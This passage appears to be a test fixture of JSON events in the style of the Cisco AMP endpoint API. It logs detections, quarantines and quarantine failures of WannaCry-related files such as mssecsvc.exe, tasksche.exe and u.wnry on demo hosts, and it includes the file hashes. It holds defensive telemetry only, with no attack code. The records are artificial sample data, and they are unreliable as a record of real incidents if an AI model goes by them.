Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat 
